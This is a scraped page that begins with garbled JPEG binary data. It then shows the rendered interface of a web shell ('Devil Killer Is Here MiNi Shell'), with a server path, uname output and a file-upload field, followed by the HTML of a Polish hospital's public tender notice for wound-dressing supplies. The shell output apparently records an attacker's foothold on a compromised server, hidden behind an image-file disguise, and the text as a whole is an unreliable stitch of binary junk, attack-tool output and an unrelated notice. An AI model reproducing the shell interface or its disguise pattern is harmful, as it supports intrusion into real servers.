JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230217/0009986401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> SUKCESYWNE DOSTAWY MATERIAŁÓW OPATRUNKOWYCH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej w Gdyni</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192953946</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstania Styczniowego 9b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-519</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@ucmmit.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ucmmit.gdynia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> SUKCESYWNE DOSTAWY MATERIAŁÓW OPATRUNKOWYCH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be62c705-aea3-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00099864</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00031472/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 SUKCESYWNE DOSTAWY MATERIAŁÓW OPATRUNKOWYCH (ok. 8 pakietów)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/728005 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/728005</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w przedmiotowym postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/ucmmit_gdynia<br/>https://platformazakupowa.pl/transakcja/728005<br/>2.	Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentów zamówienia nie wymaga logowania. <br/>3.	Za datę wpływu ofert, informacji, dokumentów lub oświadczeń, przyjmuje się datę ich wczytania na Platformie lub poczcie elektronicznej. <br/>4.	Wykonawca, za pośrednictwem Platformy, może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji warunków zamówienia. Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów (pliki można spakować) przy maksymalnej wielkości 150 MB.<br/>5.	Zamawiający dopuszcza składanie pytań drogą e-mailową, na adres: dzp@ucmmit.gdynia.pl, ze wskazaniem w tytule wiadomości numeru postępowania. Maksymalna wielkość załączonego pliku do pojedynczej wiadomości: 30 MB<br/>6.	Zamawiający zaleca przekazywanie pytań również w formie edytowalnej.<br/>7.	Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>8.	W przypadku zastosowania kwalifikowanego podpisu elektronicznego Zamawiający zaleca podpisywanie dokumentów formatem PAdES lub XAdES.<br/>9.	Niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformie zakupowej pod adresem https://platformazakupowa.pl/pn/ucmmit_gdynia tj.:<br/>	stały dostęp do sieci Internet,<br/>	zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja 11.0 lub Firefox ver.46 i późniejsze lub Chrome ver. 45 i późniejsze lub Opera ver. 37 i późniejsze, <br/>	włączona obsługa JavaScript,<br/>	oprogramowanie służące do składania kwalifikowanego podpisu elektronicznego,<br/>	zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów pdf.<br/>10.	Dopuszczalne formaty przesyłanych danych: pdf, .doc, .docx, xml,.xls,.xlsx .jpg, .zip, lub .rar , przy czym zaleca się wykorzystywanie plików w formacie .pdf<br/>a)	maksymalny rozmiar pojedynczego pliku to 150 MB,<br/>b)	informacje na temat kodowania i czasu odbioru danych tj.:<br/>	oferta załączona przez Wykonawcę na Platformie i zapisana nie jest widoczna dla Zamawiającego, ponieważ w systemie widnieje jako zaszyfrowana. Możliwość otworzenia oferty dostępna jest dopiero po upływie terminu składania ofert,<br/>	oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss).<br/>11.	Instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, pobrania dokumentacji, składania wniosków o wyjaśnienie treści SWZ, złożenia oferty oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy Zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>12.	W sprawach technicznych związanych z obsługą platformy należy korzystać z pomocy Centrum Wsparcia Klienta, które udzieli wszelkich informacji związanych z procesem składania ofert, rejestracji czy innych aspektów technicznych platformy. Centrum Wsparcia Klienta dostępne jest codziennie od poniedziałku do piątku w godz. od 8.00 do 17.00 pod nr tel. 22 101 02 02.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>Administrator danych<br/>Administratorem Pani/Pana danych osobowych jest Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej z siedzibą w Gdyni, ul. Powstania Styczniowego 9b, 81-519 Gdynia. Tel: 58 699 85 06 adres e-mail: dyrekcja@ucmmit.gdynia.pl<br/>Inspektor ochrony danych<br/>We wszystkich sprawach dotyczących ochrony danych osobowych, macie Państwo prawo kontaktować się z naszym Inspektorem ochrony danych, na adres e-mail: dane_osobowe @ucmmit.gdynia.pl;<br/>Cel przetwarzania<br/>Uniwersyteckie Centrum Medycyny Morskiej i Tropikalnej będzie przetwarzać dane osobowe w celu związanym z postępowaniem o udzielenie zamówienia publicznego, zawarcia i wykonania umowy w niniejszym postępowaniu.<br/>Podstawa przetwarzania danych<br/>Dane osobowe są przetwarzane zgodnie z art. 6 ust. 1 lit. c) ogólnego rozporządzenia o ochronie danych na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (PZP), tj. w celu wypełnienia obowiązków prawnych ciążących na Administratorze.<br/>W przypadku dobrowolnego podania danych niewynikających z przepisów prawa podstawą przetwarzania Państwa danych osobowych jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postępowaniu.<br/>Obowiązek podania danych<br/>Podanie danych osobowych w związku udziałem w postępowaniu o zamówienie publiczne jest wymogiem ustawowym określonym w przepisach ustawy PZP; konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>Okres przechowywania danych<br/>	Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego będą przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>Odbiorcy danych<br/>Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. <br/>Ograniczenie dostępu do danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust. 5 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o zamówienie publiczne mogą być podmioty, z którymi Administrator zawarł umowy lub porozumienia.<br/>Przekazywanie danych poza Europejski Obszar Gospodarczy (EOG)<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa dane mogą być przekazywane do państw z poza EOG z zastrzeżeniem, o którym mowa w punkcie powyżej.<br/>Zautomatyzowane podejmowanie decyzji<br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>Prawa osób<br/>Posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/><br/>cd pkt XXIX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.282.06.2023.TP-fn</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>1	1	Sterylny przezroczysty półprzepuszczalny opatrunek do mocowania kaniul obwodowych o wysokiej przylepności i przepuszczalności dla pary wodnej, podwójny klej na części włókninowej i foliowej, klej akrylowy naniesiony w sposób nierównomierny w siateczkę-folia i ze wzorem kropek-włóknina, gwaranttujący wysoką przepuszczalność dla pary wodnej, wzmocnienie włókniną obrzeża opatrunku z 3 stron, obrzeże z drobnymi poprzecznymi nacięciami, proste wycięcie na port pionowy, zaokrąglone brzegi, 2 włókninowe paski mocujące łatwo odklejalne od opatrunku i kaniuli z laminowanej mocnej rozciągliwej włókniny, laminowana metka do oznaczenia, rozmiar 6 x7 cm, przezroczyste okno, odporny na działanie środków dezynfekcyjnych zawierających alkohol, szybka aplikacja w 2 krokach (papier zabezpieczający i ramka),wyrób medyczny klasy IIa, niepylące, nierwące się w kierunku otwarcia opakowanie typu folia-folia z polietylenu. Potwierdzenie bariery folii dla wirusów =&gt;27nm . Opakowanie x max.100 sztuka	sztuka	10000<br/>1	2	Sterylny przezroczysty półprzepuszczalny opatrunek do mocowania cewników centralnych o wysokiej przylepności i przepuszczalności dla pary wodnej, podwójny klej na części włókninowej i foliowej, klej akrylowy naniesiony w siateczkę w sposób gwaranttujący wysoką przepuszczalność dla pary wodnej, wzmocnienie włókniną obrzeża opatrunku z 4 stron, ramka ułatwiająca aplikację, proste wycięcie na port pionowy, zaokrąglone brzegi, włókninoy pasek mocujący z wycięciem łatwo odklejalny od opatrunku i cewnika, z mocnej rozciągliwej włokniny, metka do oznaczenia, rozmiar 10 x 12 cm, przezroczyste okno, odporny na działanie środków dezynfekcyjnych zawierających alkohol, wyrób medyczny klasy IIa, niepylące, nierwące się w kierunku otwarcia opakowanie typu folia-folia, z polietylenu.Potwierdzenie bariery folii dla wirusów =&gt;27nm .Opakowanie x max 50sztuka	sztuka	400<br/>1	3	Sterylny przezroczysty półprzepuszczalny opatrunek, ramka ułatwiająca aplikację, zaokrąglone brzegi, rozmiar 10x25 cm, odporny na działanie środków dezynfekcyjnych zawierających alkohol, klej akrylowy równomiernie naniesiony na całej pwierzchni przylepnej, wyrób medyczny klasy IIa. Potwierdzenie bariery folii dla wirusów =&gt;27nm Opakowanie x max. 20sztuka	sztuka	40<br/>1	4	Sterylny przezroczysty półprzepuszczalny opatrunek, ramka ułatwiająca aplikację, zaokrąglone brzegi, rozmiar 15x20 cm, odporny na działanie środków dezynfekcyjnych zawierających alkohol, klej akrylowy równomiernie naniesiony na całej pwierzchni przylepnej, wyrób medyczny klasy IIa. Potwierdzenie bariery folii dla wirusów =&gt;27nm .Opakowanie x max.10 sztuka	sztuka	20<br/>	5	Bakteriobójczy przylepny opatrunek z PU do cewników centralnych z hydrożelem zawierającym 2% glukonian chlorheksydyny o natychmiastowym działaniu po aplikacji. Przezroczysty, z wycięciem, ze wzmocnionym włókniną od spodu obrzeżem, 8,5 x 11,5 cm, 2 szerokie min. 2,5-3,5 cm aplikatory, z ramką, metką i 2 paskami mocującymi, klej akrylowy naniesiony ze wzorem siateczki dla wysokiej przepuszczalności pary wodnej, wyrób medyczny klasy III, opakowanie typu folia-folia. Potwierdzenie bariery folii dla wirusów =&gt;27nm.Opakowanie x max25 sztuka	sztuka	300<br/>1	6	Przylepiec chirurgiczny, hypoalergiczny, z mikroporowatej włókniny, o wymiarach 2,5 cm x 9,1m z wodoodpornym równomiernie naniesionym na całej powierzchni klejem akrylowym, bez lateksu, delikatny dla skóry	rolka	1200<br/>1	7	Przylepiec chirurgiczny, hypoalergiczny, z mikroporowatej włókniny, o wymiarach 1,25 cm x 9,1m z wodoodpornym równomiernie naniesionym na całej powierzchni klejem akrylowym, bez lateksu, kauczu i tlenku cynku, delikatny dla skóry	rolka	500<br/>1	8	Przylepiec chirurgiczny, hypoalergiczny, z mikroporowatej włókniny, o wymiarach 5 cm x 9,1m z wodoodpornym równomiernie naniesionym na całej powierzchni klejem akrylowym, bez lateksu, kauczu i tlenku cynku, delikatny dla skóry	rolka	300 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>2	1	Gaza bawełniana, opatrunkowa, 13 nitkowa, jałowa klasa II a reguła 7, 1 m².Sterylizowana parą wodną. WYMAGANY DOKUMENT POTWIERDZAJĄCY METODĘ STERYLIZACJI PARĄ WODNĄ DO OFERTY.	sztuka	9000<br/>2	1	Kompresy gazowe, 17 nitkowe, 8 warstwowe, niejałowe, z podwijanymi brzegami z gazy o wymiarze min 12,5 x19,5 klasa II a reguła 7, rozm. 5 x 5 cm a max.100 sztuka.	sztuka	90000<br/>2	2	Kompresy gazowe, 17 nitkowe, 8 warstwowe, niejałowe z podwijanymi brzegami z gazy o wymiarze minimum 17 x29,5cm klasa II a reguła 7, rozm. 7,5 x 7,5 cm a max.100 sztuka.	sztuka	120000<br/>2	3	Kompresy gazowe, 17 nitkowe, 8 warstwowe, niejałowe z podwijanymi brzegami z gazy o wymiarze minimum 22 x 39,5cm, klasa II a reguła 7, rozm.10 x 10 cm a max.100 sztuka.	sztuka	90000<br/>2	4	Kompresy gazowe, 17 nitkowe, 8 warstwowe, jałowe, z podwijanymi brzegami z gazy o wymiarze min.12 x19,5cm, klasa II a reguła 7; rozm. 5 x 5 cm a 2 sztuka. x 25 Sterylizowane parą wodną. WYMAGANY DOKUMENT POTWIERDZAJĄCY METODĘ STERYLIZACJI PARĄ WODNĄ DO OFERTY.	sztuka	10000<br/>2	5	Kompresy gazowe, 17 nitkowe, 8 warstwowe, jałowe, z podwijanymi brzegami z gazy o wymiarze min.17x 29,5cm, klasa II a reguła 7; rozm. 7,5 x 7,5 cm a 2 sztuka. x 25 Sterylizowane para wodną. WYMAGANY DOKUMENT POTWIERDZAJĄCY METODĘ STERYLIZACJI PARĄ WODNĄ DO OFERTY.	sztuka	12000<br/>2	6	Kompresy gazowe, 17 nitkowe, 8 warstwowe, jałowe, z podwijanymi brzegami z gazy o wymiarze min. 22 x 39,5cm, klasa II a , reguła 7; rozm. 10 x 10 cm a 2 sztuka. x 25 sterylizowane para wodną. WYMAGANY DOKUMENT POTWIERDZAJĄCY METODĘ STERYLIZACJI PARĄ WODNĄ DO OFERTY.	sztuka	25000<br/>2	7	Wata celulozowa bielona a&#39;5 kg ,gramatura pojedynczej warstwy min. 36 gr/m2 lignina zapakowana w opakowaniu 